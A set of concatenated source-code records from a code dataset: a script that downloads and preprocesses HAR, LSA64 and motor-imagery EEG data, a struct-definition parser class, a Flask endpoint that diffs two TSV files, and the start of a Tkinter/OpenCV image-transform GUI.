np.zeros((data_dict[row[8]][row[6]][mod]['n_pt'],3), dtype=np.float64)\n data_dict[row[8]][row[6]][mod]['label'] = np.zeros((data_dict[row[8]][row[6]][mod]['n_pt']))\n \n data_dict[row[8]][row[6]][mod]['index'][i] = int(row[0])\n data_dict[row[8]][row[6]][mod]['time'][i] = float(row[2]) / 1e6 # Convert to miliseconds\n data_dict[row[8]][row[6]][mod]['meas'][i,:] = [float(row[3]), float(row[4]), float(row[5])]\n data_dict[row[8]][row[6]][mod]['label'][i] = int(label_dict[row[9]])\n\n i += 1\n\n # Delete keys that either \n # - is missing one modality (e.g. all sansungold devices only have one modality for some reason)or \n # - has a number of datapoint that is too low (e.g. 
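The HAR loader reads each CSV twice: a first pass counts rows per key (`n_pt`), a second pass fills preallocated NumPy arrays, avoiding repeated list growth on very large files. A stripped-down sketch of that two-pass pattern for a single column; the demo file and column index are hypothetical:

```python
import csv
import tempfile
import numpy as np

def load_column(path, col):
    """Two-pass CSV load: count rows first, then fill a preallocated array."""
    with open(path) as f:
        n_rows = sum(1 for _ in csv.reader(f)) - 1   # minus the header row
    out = np.empty(n_rows, dtype=np.float64)
    with open(path) as f:
        reader = csv.reader(f)
        next(reader)                                 # skip header
        for i, row in enumerate(reader):
            out[i] = float(row[col])
    return out

# Tiny self-contained demo.
with tempfile.NamedTemporaryFile("w", suffix=".csv", delete=False) as f:
    f.write("idx,val\n0,1.5\n1,2.5\n")
    path = f.name
print(load_column(path, 1))   # [1.5 2.5]
```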
gear_2 -> 'i' only has 1 point for some reason)\n to_delete = []\n for device in data_dict.keys():\n for sub in data_dict[device].keys():\n if len(data_dict[device][sub].keys()) != 2:\n print(\"....\")\n print(\"len\")\n print(device, sub)\n to_delete.append((device, sub))\n continue\n for mod in data_dict[device][sub].keys():\n if data_dict[device][sub][mod]['n_pt'] < 10000:\n print(\"....\")\n print(\"n_pt\")\n print(data_dict[device][sub][mod]['n_pt'])\n print(device, sub)\n to_delete.append((device, sub))\n break\n for key in to_delete:\n del data_dict[key[0]][key[1]]\n print(to_delete)\n\n ## Sort data\n for device in data_dict.keys():\n for sub in data_dict[device].keys():\n for mod in data_dict[device][sub].keys():\n # Sort by index\n index_sort = np.argsort(data_dict[device][sub][mod]['index'])\n data_dict[device][sub][mod]['index'] = np.take_along_axis(data_dict[device][sub][mod]['index'], index_sort, axis=0)\n data_dict[device][sub][mod]['time'] = np.take_along_axis(data_dict[device][sub][mod]['time'], index_sort, axis=0)\n data_dict[device][sub][mod]['meas'] = data_dict[device][sub][mod]['meas'][index_sort,:]\n data_dict[device][sub][mod]['label'] = np.take_along_axis(data_dict[device][sub][mod]['label'], index_sort, axis=0)\n\n # This is to take data that is within recording time \n # (To see an example of somewhere this isn't the case, check phones_gyrscope -> nexus4_1 -> a -> index [24641, 24675])\n inliers = np.argwhere( np.logical_and( data_dict[device][sub][mod]['time'][0] <= data_dict[device][sub][mod]['time'], \n data_dict[device][sub][mod]['time'] <= data_dict[device][sub][mod]['time'][-1]))[:,0]\n \n # Sort by time value\n time_sort = np.argsort(data_dict[device][sub][mod]['time'][inliers])\n\n data_dict[device][sub][mod]['index'] = data_dict[device][sub][mod]['index'][inliers][time_sort]\n data_dict[device][sub][mod]['time'] = data_dict[device][sub][mod]['time'][inliers][time_sort]\n data_dict[device][sub][mod]['meas'] = data_dict[device][sub][mod]['meas'][inliers][time_sort,:]\n data_dict[device][sub][mod]['label'] = data_dict[device][sub][mod]['label'][inliers][time_sort]\n\n device_env_mapping = { 'nexus4_1': 'nexus4',\n 'nexus4_2': 'nexus4',\n 's3_1': 's3',\n 's3_2': 's3',\n 's3mini_1': 's3mini',\n 's3mini_2': 's3mini',\n 'gear_1': 'gear',\n 'gear_2': 'gear',\n 'lgwatch_1': 'lgwatch',\n 'lgwatch_2': 'lgwatch'}\n\n for device in data_dict.keys():\n for i, sub in enumerate(data_dict[device].keys()):\n print(\"..........\")\n print(device, sub)\n # print(len(data_dict[device][sub]['gyro']['time']), data_dict[device][sub]['gyro']['time'][0], data_dict[device][sub]['gyro']['time'][-1])\n # print(len(data_dict[device][sub]['acc']['time']), data_dict[device][sub]['acc']['time'][0], data_dict[device][sub]['acc']['time'][-1])\n\n tmin = np.max([data_dict[device][sub]['gyro']['time'][0], data_dict[device][sub]['acc']['time'][0]])\n tmax = np.min([data_dict[device][sub]['gyro']['time'][-1], data_dict[device][sub]['acc']['time'][-1]])\n # print(tmin, tmax)\n\n gyro_in = np.argwhere( np.logical_and( tmin <= data_dict[device][sub]['gyro']['time'], \n data_dict[device][sub]['gyro']['time'] <= tmax))[:,0]\n acc_in = np.argwhere( np.logical_and( tmin <= data_dict[device][sub]['acc']['time'], \n data_dict[device][sub]['acc']['time'] <= tmax))[:,0]\n\n data_dict[device][sub]['gyro']['index'] = data_dict[device][sub]['gyro']['index'][gyro_in]\n data_dict[device][sub]['gyro']['time'] = data_dict[device][sub]['gyro']['time'][gyro_in]\n data_dict[device][sub]['gyro']['meas'] = 
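The sort step above reorders several parallel arrays by a single key using `np.argsort`; for 1-D arrays, plain fancy indexing is equivalent to `np.take_along_axis`, and 2-D arrays just reuse the same row order. A tiny worked example:

```python
import numpy as np

# Co-sorting parallel arrays by one key, as done above with argsort:
index = np.array([3, 1, 2])
time = np.array([30.0, 10.0, 20.0])
meas = np.array([[3, 3], [1, 1], [2, 2]])

order = np.argsort(index)          # permutation that sorts `index`
index = index[order]               # 1-D arrays can be fancy-indexed directly
time = time[order]
meas = meas[order, :]              # rows of the 2-D array follow the same order

print(index, time, meas.tolist())  # [1 2 3] [10. 20. 30.] [[1, 1], [2, 2], [3, 3]]
```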
data_dict[device][sub]['gyro']['meas'][gyro_in]\n data_dict[device][sub]['gyro']['label'] = data_dict[device][sub]['gyro']['label'][gyro_in]\n data_dict[device][sub]['acc']['index'] = data_dict[device][sub]['acc']['index'][acc_in]\n data_dict[device][sub]['acc']['time'] = data_dict[device][sub]['acc']['time'][acc_in]\n data_dict[device][sub]['acc']['meas'] = data_dict[device][sub]['acc']['meas'][acc_in]\n data_dict[device][sub]['acc']['label'] = data_dict[device][sub]['acc']['label'][acc_in]\n\n gyro_in = np.argwhere(data_dict[device][sub]['gyro']['label'] != 6)[:,0]\n acc_in = np.argwhere(data_dict[device][sub]['acc']['label'] != 6)[:,0]\n\n data_dict[device][sub]['gyro']['index'] = data_dict[device][sub]['gyro']['index'][gyro_in]\n data_dict[device][sub]['gyro']['time'] = data_dict[device][sub]['gyro']['time'][gyro_in]\n data_dict[device][sub]['gyro']['meas'] = data_dict[device][sub]['gyro']['meas'][gyro_in,:]\n data_dict[device][sub]['gyro']['label'] = data_dict[device][sub]['gyro']['label'][gyro_in]\n data_dict[device][sub]['acc']['index'] = data_dict[device][sub]['acc']['index'][acc_in]\n data_dict[device][sub]['acc']['time'] = data_dict[device][sub]['acc']['time'][acc_in]\n data_dict[device][sub]['acc']['meas'] = data_dict[device][sub]['acc']['meas'][acc_in,:]\n data_dict[device][sub]['acc']['label'] = data_dict[device][sub]['acc']['label'][acc_in]\n\n ## Scale data\n data_dict[device][sub]['gyro']['meas'] = scale(data_dict[device][sub]['gyro']['meas'])\n data_dict[device][sub]['acc']['meas'] = scale(data_dict[device][sub]['acc']['meas'])\n\n # Resample and split the data here\n idx = 0\n data = np.zeros((0,500,6))\n labels = np.zeros((0,1))\n while True:\n if idx >= len(data_dict[device][sub]['gyro']['time'])-1:\n break\n start_time = data_dict[device][sub]['gyro']['time'][idx]\n gyro_in = np.argwhere( np.logical_and( start_time <= data_dict[device][sub]['gyro']['time'], \n data_dict[device][sub]['gyro']['time'] <= start_time+5000))[:,0]\n acc_in = np.argwhere( np.logical_and( start_time <= data_dict[device][sub]['acc']['time'],\n data_dict[device][sub]['acc']['time'] <= start_time+5000))[:,0]\n print(len(gyro_in), len(acc_in))\n \n if len(gyro_in) == 0 or len(acc_in) == 0:\n # print(\"time not intersecting segment\")\n idx += len(gyro_in)\n continue \n if data_dict[device][sub]['gyro']['time'][gyro_in][-1] - data_dict[device][sub]['gyro']['time'][gyro_in][0] < 4900 or data_dict[device][sub]['acc']['time'][acc_in][-1] - data_dict[device][sub]['acc']['time'][acc_in][0] < 4900:\n # print(\"end on break segment\")\n idx += len(gyro_in)\n continue\n if len(np.argwhere(np.diff(data_dict[device][sub]['gyro']['time'][gyro_in]) > 200)[:,0]) > 0 :\n diff = np.argwhere(np.diff(data_dict[device][sub]['gyro']['time'][gyro_in]) > 200)[:,0]\n # print(\"gyro contains a break\")\n idx += diff[-1]+1\n continue\n if len(np.argwhere(np.diff(data_dict[device][sub]['acc']['time'][acc_in]) > 200)[:,0]) > 0:\n diff = np.argwhere(np.diff(data_dict[device][sub]['acc']['time'][acc_in]) > 200)[:,0]\n # print(\"acc contains a break\")\n idx += diff[-1]+1\n continue\n start_label = data_dict[device][sub]['gyro']['label'][idx]\n if len(np.argwhere(data_dict[device][sub]['gyro']['label'][gyro_in] != start_label)[:,0]) > 0:\n labels_diff = np.argwhere(data_dict[device][sub]['gyro']['label'][gyro_in] != start_label)[:,0]\n # print(\"label switch in sequence\")\n idx += labels_diff[0]+1\n continue\n \n idx += len(gyro_in)\n\n time = np.linspace(start = data_dict[device][sub]['gyro']['time'][gyro_in][0], 
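The windowing loop rejects any 5-second segment whose timestamps contain a gap larger than 200 ms, using `np.diff` on the candidate window. The check in isolation, with the threshold value taken from the loop above:

```python
import numpy as np

def has_break(timestamps, max_gap_ms=200):
    """True if consecutive samples are ever further apart than `max_gap_ms`."""
    return bool(np.any(np.diff(timestamps) > max_gap_ms))

t_ok = np.arange(0, 5000, 10)                             # steady 10 ms sampling
t_gap = np.concatenate([t_ok[:100], t_ok[100:] + 1000])   # 1 s dropout injected

print(has_break(t_ok), has_break(t_gap))   # False True
```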
stop=data_dict[device][sub]['gyro']['time'][gyro_in][-1], num=500)\n gyro_dat = resample(data_dict[device][sub]['gyro']['meas'][gyro_in, :], 500)\n acc_dat = resample(data_dict[device][sub]['acc']['meas'][acc_in, :], 500)\n\n all_dat = np.concatenate((acc_dat, gyro_dat), axis=1)\n data = np.concatenate((data, np.expand_dims(all_dat, axis=0)), axis=0)\n labels = np.concatenate((labels, np.expand_dims(data_dict[device][sub]['gyro']['label'][gyro_in][0:1], axis=0)), axis=0)\n \n env = device_env_mapping[device]\n\n with h5py.File(os.path.join(flags.data_path, 'HAR/HAR.h5'), 'a') as hf:\n if env not in hf.keys():\n g = hf.create_group(env)\n g.create_dataset('data', data=data.astype('float32'), dtype='float32', maxshape=(None, 500, 6))\n g.create_dataset('labels', data=labels.astype('float32'), dtype='int_', maxshape=(None,1))\n else:\n hf[env]['data'].resize((hf[env]['data'].shape[0] + data.shape[0]), axis = 0)\n hf[env]['data'][-data.shape[0]:,:,:] = data\n hf[env]['labels'].resize((hf[env]['labels'].shape[0] + labels.shape[0]), axis = 0)\n hf[env]['labels'][-labels.shape[0]:,:] = labels\n\ndef LSA64(flags):\n \"\"\" Fetch the LSA64 dataset and preprocess it\n\n Note:\n You need to manually download the HAR dataset from the source and place it in the data folder in order to preprocess it yourself:\n\n https://mega.nz/file/FQJGCYba#uJKGKLW1VlpCpLCrGVu89wyQnm9b4sKquCOEAjW5zMo\n\n Args:\n flags (argparse.Namespace): The flags of the script\n \"\"\"\n\n for person in range(1,11):\n person_ID = str(person).zfill(3)\n \n for i, file in enumerate(glob.glob(os.path.join(flags.data_path, 'LSA64', '*_'+person_ID+'_*'))):\n print(str(i+1)+ ' / 320 (' + file+')')\n ID = file.split('/')[-1].split('_')\n sample_num = ID[-1].split('.')[0]\n \n vid = torchvision.io.read_video(os.path.join(flags.data_path, 'LSA64', file), end_pts=2.5, pts_unit='sec')[0]\n\n transform = Compose([ToTensorVideo(),\n Resize(size=(224, 224)),\n UniformTemporalSubsample(20)])#,\n # NormalizeVideo(mean=[0.485, 0.456, 0.406],\n # std=[0.229, 0.224, 0.225])])\n vid = transform(vid)\n\n if not os.path.exists(os.path.join(flags.data_path, 'LSA64', ID[1])):\n os.makedirs(os.path.join(flags.data_path, 'LSA64', ID[1]))\n if not os.path.exists(os.path.join(flags.data_path, 'LSA64', ID[1], ID[0])):\n os.makedirs(os.path.join(flags.data_path, 'LSA64', ID[1], ID[0]))\n if not os.path.exists(os.path.join(flags.data_path, 'LSA64', ID[1], ID[0], sample_num)):\n os.mkdir(os.path.join(flags.data_path, 'LSA64', ID[1], ID[0], sample_num))\n for frame in range(vid.shape[1]):\n torchvision.utils.save_image(vid[:,frame,...], os.path.join(flags.data_path, 'LSA64', ID[1], ID[0], sample_num, 'frame_'+str(frame).zfill(6)+'.jpg'))\n\nclass MI():\n '''\n This class helps to download and prepare MI datasets\n \n '''\n\n def __init__(self,flags):\n super(MI, self).__init__()\n\n self.path = flags.data_path\n\n print('Downloading MI datasets')\n mne.set_config('MNE_DATASETS_BNCI_PATH', self.path)\n utils.set_download_dir(self.path)\n\n # Datasets\n ds_src1 = Cho2017()\n ds_src2 = PhysionetMI()\n ds_src3 = BNCI2014001()\n\n fmin, fmax = 4, 32\n raw = ds_src3.get_data(subjects=[1])[1]['session_T']['run_1']\n src3_channels = raw.pick_types(eeg=True).ch_names\n sfreq = 250.\n prgm_2classes = MotorImagery(n_classes=2, channels=src3_channels, resample=sfreq, fmin=fmin, fmax=fmax)\n prgm_4classes = MotorImagery(n_classes=4, channels=src3_channels, resample=sfreq, fmin=fmin, fmax=fmax)\n\n print(\"Fetching data\")\n X_src1, label_src1, m_src1 = 
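Each accepted window is resampled to exactly 500 samples per channel and the two modalities are stacked into a `(500, 6)` array. Assuming `resample` here is `scipy.signal.resample` (consistent with the call signature used above, though the record's imports are outside this excerpt), a sketch with synthetic windows:

```python
import numpy as np
from scipy.signal import resample

# Resample variable-length windows to exactly 500 samples per channel,
# then stack accelerometer and gyroscope side by side, as in the loop above.
rng = np.random.default_rng(0)
acc = rng.normal(size=(487, 3))    # one ~5 s window, 3-axis accelerometer
gyro = rng.normal(size=(512, 3))   # same window from the gyroscope

acc_500 = resample(acc, 500)       # FFT-based resampling along axis 0
gyro_500 = resample(gyro, 500)

window = np.concatenate((acc_500, gyro_500), axis=1)
print(window.shape)                # (500, 6)
```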
prgm_2classes.get_data(dataset=ds_src1, subjects=[subj for subj in range(1,53) if subj not in [32,46,49]]) # three subjects [32,46,49] were removed in the moabb implementation (see:http://moabb.neurotechx.com/docs/_modules/moabb/datasets/gigadb.html#Cho2017)\n print(\"First source dataset has {} trials with {} electrodes and {} time samples\".format(*X_src1.shape))\n print (\"\\nSource dataset 1 include labels: {}\".format(np.unique(label_src1)))\n X_src2, label_src2, m_src2 = prgm_4classes.get_data(dataset=ds_src2, subjects=list(range(1,110))) \n print(\"Second source dataset has {} trials with {} electrodes and {} time samples\".format(*X_src2.shape))\n print (\"Source dataset 2 include labels: {}\".format(np.unique(label_src2)))\n X_src3, label_src3, m_src3 = prgm_4classes.get_data(dataset=ds_src3, subjects=list(range(1,10))) \n print(\"Third source dataset has {} trials with {} electrodes and {} time samples\".format(*X_src3.shape))\n print (\"Source dataset 3 include labels: {}\".format(np.unique(label_src3)))\n\n y_src1 = np.array([self.relabel(l) for l in label_src1])\n y_src2 = np.array([self.relabel(l) for l in label_src2])\n y_src3 = np.array([self.relabel(l) for l in label_src3])\n\n print(\"Only right-/left-hand labels are used and first source dataset does not have other labels:\")\n print(np.unique(y_src1), np.unique(y_src2), np.unique(y_src3)) \n\n # Deleting trials of \"other labels\"\n print(\"Deleting trials from 'other labels'\")\n X_src2 = np.delete(X_src2,y_src2==2,0)\n y_src2 = np.delete(y_src2,y_src2==2,0)\n X_src3 = np.delete(X_src3,y_src3==2,0)\n y_src3 = np.delete(y_src3,y_src3==2,0)\n\n ## windowing trails\n window_size = min(X_src1.shape[2], X_src2.shape[2], X_src3.shape[2])\n X_src1 = X_src1[:, :, :window_size]\n X_src2 = X_src2[:, :, :window_size]\n X_src3 = X_src3[:, :, :window_size]\n\n ## Create group in h5 file\n dummy_data = np.zeros((0,window_size,len(src3_channels)))\n dummy_labels = np.zeros((0,1))\n groups = ['Cho2017', 'PhysionetMI', 'BNCI2014001']\n X = [X_src1, X_src2, X_src3]\n Y = [y_src1, y_src2, y_src3]\n with h5py.File(os.path.join(self.path, 'MI.h5'), 'a') as hf:\n for g in groups:\n g = hf.create_group(g)\n g.create_dataset('data', data=dummy_data.astype('float32'), dtype='float32', maxshape=(None, window_size, len(src3_channels)))\n g.create_dataset('labels', data=dummy_labels.astype('float32'), dtype='int_', maxshape=(None,1))\n \n ## Save data to h5 file\n for group, x, y in zip(groups,X,Y):\n with h5py.File(os.path.join(self.path, 'MI.h5'), 'a') as hf:\n hf[group]['data'].resize((hf[group]['data'].shape[0] + x.shape[0]), axis = 0)\n hf[group]['data'][-x.shape[0]:,:,:] = x.transpose((0,2,1))\n hf[group]['labels'].resize((hf[group]['labels'].shape[0] + y.shape[0]), axis = 0)\n hf[group]['labels'][-y.shape[0]:,:] = y.reshape([-1,1])\n \n def relabel(self,l):\n \"\"\" Converts labels from str to int \"\"\"\n if l == 'left_hand': return 0\n elif l == 'right_hand': return 1\n else: return 2\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Download datasets')\n parser.add_argument('dataset', nargs='*', type=str, default=DATASETS)\n parser.add_argument('--data_path', type=str, default='~/Documents/Data/')\n flags = parser.parse_args()\n\n print('Flags:')\n for k,v in sorted(vars(flags).items()):\n print(\"\\t{}: {}\".format(k, v))\n\n if 'CAP' in flags.dataset:\n CAP(flags)\n\n if 'SEDFx' in flags.dataset:\n SEDFx(flags)\n \n if 'MI' in flags.dataset:\n MI(flags)\n\n if 'RealizedVolatility' in flags.dataset:\n 
RealizedVolatility(flags)\n\n if 'HAR' in flags.dataset:\n HAR(flags)\n\n if 'LSA64' in flags.dataset:\n LSA64(flags)","sub_path":"woods/scripts/fetch_and_preprocess.py","file_name":"fetch_and_preprocess.py","file_ext":"py","file_size_in_byte":47050,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"36430147","text":"# Copyright AllSeen Alliance. All rights reserved.\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\nimport common\nimport validate\nimport fielddef\n\nclass StructDef:\n \"\"\"Contains the description of a declared structure\"\"\"\n\n def __init__(self):\n \"\"\"Initialize an instance of the StructDef class\"\"\"\n self.name = \"\"\n self.fields = []\n\n return\n\n def parse(self, xml, lax_naming):\n \"\"\"Parse the given struct xml element\"\"\"\n #print(\"Parsing Struct '{0}'\".format(xml.get('name')))\n self.name = xml.get('name')\n validate.type_name(self.name)\n\n for fieldnode in xml.findall('field'):\n f = fielddef.FieldDef()\n f.parse(fieldnode, lax_naming)\n self.add_field(fieldnode, f)\n\n return\n\n def add_field(self, xml, field):\n for f in self.fields:\n if f.name == field.name:\n validate.raise_exception(xml,\n \"Duplicate field name '{0}' not allowed.\".format(f.name))\n\n self.fields.append(field)\n return\n\n def get_flattened_signature(self):\n sig = \"(\"\n for field in self.fields:\n sig += field.get_flattened_signature()\n sig += \")\"\n return sig\n\n def get_order(self):\n return len(self.get_flattened_signature())\n\n def get_field_list(self):\n return self.fields\n\n def __str__(self):\n description = \" Name: {0}:\\n\".format(self.name)\n for field in self.fields:\n description += \" {0}\\n\".format(str(field))\n return description\n\n def __eq__(self, other):\n \"\"\"Compares this struct definition to another and returns true if equal.\"\"\"\n if not isinstance(other, StructDef):\n return False\n if other.name != self.name or len(other.fields) != len(self.fields):\n return False\n\n for index in range(len(self.fields)):\n f = self.fields[index]\n other_f = other.fields[index]\n if other_f != f:\n return False\n\n return True\n\n def __ne__(self, other):\n \"\"\"Implements the '!=' operator.\"\"\"\n if self == other:\n return False\n return True\n","sub_path":"src/structdef.py","file_name":"structdef.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"473636050","text":"# EMBL-EBI MetaboLights - https://www.ebi.ac.uk/metabolights\n# Metabolomics team\n#\n# European Bioinformatics Institute (EMBL-EBI), European Molecular Biology Laboratory, Wellcome Genome Campus, Hinxton, Cambridge CB10 1SD, United Kingdom\n#\n# Last modified: 2020-Feb-14\n# Modified by: kenneth\n#\n# Copyright 2020 EMBL - European Bioinformatics 
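The `structdef.py` record above hand-writes both `__eq__` and `__ne__`; in Python 3, `__ne__` is derived from `__eq__` automatically, and a `dataclass` generates the field-wise comparison outright, so the explicit `__ne__` is a Python 2 leftover. A sketch of the equivalent (field signatures are illustrative):

```python
from dataclasses import dataclass, field
from typing import List

@dataclass
class FieldDef:
    name: str
    signature: str

@dataclass
class StructDef:
    name: str
    fields: List[FieldDef] = field(default_factory=list)

    def flattened_signature(self) -> str:
        # "(" + concatenated field signatures + ")", as in the record above.
        return "(" + "".join(f.signature for f in self.fields) + ")"

a = StructDef("Point", [FieldDef("x", "i"), FieldDef("y", "i")])
b = StructDef("Point", [FieldDef("x", "i"), FieldDef("y", "i")])
print(a == b, a != b, a.flattened_signature())   # True False (ii)
```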
Institute\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\nimport logging\nimport numpy as np\nimport pandas as pd\n\nfrom flask import request, abort\nfrom flask.json import jsonify\nfrom flask_restful import Resource, reqparse\nfrom flask_restful_swagger import swagger\nfrom app.ws.mtblsWSclient import WsClient\nfrom app.ws.utils import log_request, read_tsv\nfrom app.ws.isaApiClient import IsaApiClient\n\n\nlogger = logging.getLogger('wslog')\nwsc = WsClient()\niac = IsaApiClient()\n\ndef diff_pd(df1, df2):\n # https://stackoverflow.com/questions/17095101/outputting-difference-in-two-pandas-dataframes-side-by-side-highlighting-the-d\n \"\"\"Identify differences between two pandas DataFrames\"\"\"\n assert (df1.columns == df2.columns).all(), \\\n \"DataFrame column names are different\"\n if any(df1.dtypes != df2.dtypes):\n \"Data Types are different, trying to convert\"\n df2 = df2.astype(df1.dtypes)\n if df1.equals(df2):\n return None\n else:\n # need to account for np.nan != np.nan returning True\n diff_mask = (df1 != df2) & ~(df1.isnull() & df2.isnull())\n ne_stacked = diff_mask.stack()\n changed = ne_stacked[ne_stacked]\n changed.index.names = ['id', 'col']\n difference_locations = np.where(diff_mask)\n changed_from = df1.values[difference_locations]\n changed_to = df2.values[difference_locations]\n return pd.DataFrame({'from': changed_from, 'to': changed_to},\n index=changed.index)\n\n\nclass CompareTsvFiles(Resource):\n @swagger.operation(\n summary=\"Find the difference between two tsv (ISA-Tab) files\",\n parameters=[\n {\n \"name\": \"study_id\",\n \"description\": \"Study Identifier\",\n \"required\": True,\n \"allowMultiple\": False,\n \"paramType\": \"path\",\n \"dataType\": \"string\"\n },\n {\n \"name\": \"filename1\",\n \"description\": \"TSV filename one\",\n \"required\": True,\n \"allowEmptyValue\": False,\n \"allowMultiple\": False,\n \"paramType\": \"query\",\n \"dataType\": \"string\"\n },\n {\n \"name\": \"filename2\",\n \"description\": \"TSV filename two\",\n \"required\": True,\n \"allowEmptyValue\": False,\n \"allowMultiple\": False,\n \"paramType\": \"query\",\n \"dataType\": \"string\"\n },\n {\n \"name\": \"user_token\",\n \"description\": \"User API token\",\n \"paramType\": \"header\",\n \"type\": \"string\",\n \"required\": True,\n \"allowMultiple\": False\n }\n ],\n responseMessages=[\n {\n \"code\": 200,\n \"message\": \"OK.\"\n },\n {\n \"code\": 401,\n \"message\": \"Unauthorized. Access to the resource requires user authentication.\"\n },\n {\n \"code\": 403,\n \"message\": \"Study does not exist or your do not have access to this study.\"\n },\n {\n \"code\": 404,\n \"message\": \"Not found. 
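The `diff_pd` helper above locates changed cells with a boolean mask, `stack`, and `np.where`, treating NaN-vs-NaN as "no change". A compact runnable illustration of the same technique on toy frames:

```python
import numpy as np
import pandas as pd

df1 = pd.DataFrame({"a": [1, 2, 3], "b": ["x", "y", "z"]})
df2 = pd.DataFrame({"a": [1, 9, 3], "b": ["x", "y", "q"]})

# Cells that differ, with NaN == NaN treated as unchanged (diff_pd's trick).
diff_mask = (df1 != df2) & ~(df1.isnull() & df2.isnull())
ne_stacked = diff_mask.stack()
changed = ne_stacked[ne_stacked]          # MultiIndex of (row id, column name)
changed.index.names = ["id", "col"]

rows, cols = np.where(diff_mask)          # positions of every changed cell
report = pd.DataFrame({"from": df1.values[rows, cols],
                       "to": df2.values[rows, cols]},
                      index=changed.index)
print(report)                             # (1, a): 2 -> 9 and (2, b): z -> q
```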
The requested identifier is not valid or does not exist.\"\n }\n ]\n )\n def get(self, study_id):\n\n log_request(request)\n # param validation\n if study_id is None:\n abort(404)\n study_id = study_id.upper()\n\n # User authentication\n user_token = None\n if 'user_token' in request.headers:\n user_token = request.headers['user_token']\n\n if user_token is None:\n abort(401)\n\n # query validation\n parser = reqparse.RequestParser()\n parser.add_argument('filename1', help='TSV filename one')\n parser.add_argument('filename2', help='TSV filename two')\n assay_filename = None\n if request.args:\n args = parser.parse_args(req=request)\n filename1 = args['filename1'].lower() if args['filename1'] else None\n filename2 = args['filename2'].lower() if args['filename2'] else None\n if not filename1 or not filename2:\n logger.warning(\"Missing TSV filenames.\")\n abort(404, \"Missing TSV filenames.\")\n\n # check for access rights\n is_curator, read_access, write_access, obfuscation_code, study_location, release_date, submission_date, \\\n study_status = wsc.get_permissions(study_id, user_token)\n if not read_access:\n abort(401, \"Study does not exist or your do not have access to this study.\")\n\n location = study_location\n df1 = read_tsv(filename1)\n df2 = read_tsv(filename2)\n diff_df = diff_pd(df1, df2)\n return jsonify({\"entries\": diff_df})\n","sub_path":"app/ws/compare_files.py","file_name":"compare_files.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"181306236","text":"#khai báo các module cần thiết \nfrom PIL import Image, ImageTk #hàm phụ trợ cho giao diện lồng ảnh trong giao diện\nfrom tkinter import Tk, BOTH, Canvas, NW, Frame, Label \nfrom tkinter import messagebox as mbox \nfrom tkinter.ttk import Frame, Button, Style #hàm phụ trợ thiết kế giao diện\nimport cv2 \nimport numpy as np \n\n#khai báo các biến toàn cục\nimg = cv2.imread('twice.jpg')\nrows, cols, ch = img.shape\n\nclass BTL(Frame):\n\tdef __init__(self, parent): #hàm khởi tạo tkinter\n\t\tFrame.__init__(self, parent)\n\t\tself.parent = parent\n\t\tself.initUI()\n\n\tdef initUI(self): #hàm thiết lập UI\n\t\tself.parent.title('Bài Tập Lớn') #tạo tiêu đề cho khung Tkinter\n\t\tself.pack(fill = BOTH, expand = 1)\n\n\t\tStyle().configure(\"TFrame\", background=\"#333\")\n\n\t\tbard = Image.open(\"logo.png\")\n\t\tbardejov = ImageTk.PhotoImage(bard)\n\t\tlabel1 = Label(self, image = bardejov)\n\t\tlabel1.image = bardejov\n\t\tlabel1.place(x = 0, y = 0)\n\n\t\tintrod = Button(self, text = \"General Introduction\", command = self.onIntro)\n\t\tintrod.grid(padx = 10, pady = 20)\n\t\tintrod.place(x = 150, y = 10)\n\t\tresize = Button(self, text = \"Scaling\", command = self.onResize)\n\t\tresize.grid(row = 1, column = 0)\n\t\tresize.place(x = 170, y = 50)\n\t\ttransl = Button(self, text = \"Translation\", command = self.onTranslation)\n\t\ttransl.grid(row = 2, column = 0)\n\t\ttransl.place(x = 170, y = 80)\n\t\trotate = Button(self, text = \"Rotate\", command = self.onRotate)\n\t\trotate.grid(row = 3, column = 0)\n\t\trotate.place(x = 170, y = 110)\n\t\taffine = Button(self, text = \"Affine Transform\", command = self.onAffine)\n\t\taffine.grid(row = 4, column = 0)\n\t\taffine.place(x = 157, y = 140)\n\t\tperspt = Button(self, text = \"Perspective Transform\", command = self.onPerspect)\n\t\tperspt.grid(row = 5, column = 0)\n\t\tperspt.place(x = 142, y = 170)\n\t\tapplic = Button(self, text = \"Application\", command = 
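The `label1.image = bardejov` line in the Tkinter record above guards against a classic pitfall: Tk keeps no Python-side reference to a `PhotoImage`, so without the extra attribute the image is garbage-collected and the label renders blank. The pattern in isolation (the file name is illustrative):

```python
import tkinter as tk

root = tk.Tk()

photo = tk.PhotoImage(file="logo.png")   # any GIF/PNG; path is illustrative
label = tk.Label(root, image=photo)
# Tk does not hold a Python reference to the image; without this line the
# PhotoImage can be garbage-collected and the label goes blank.
label.image = photo
label.pack()

root.mainloop()
```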
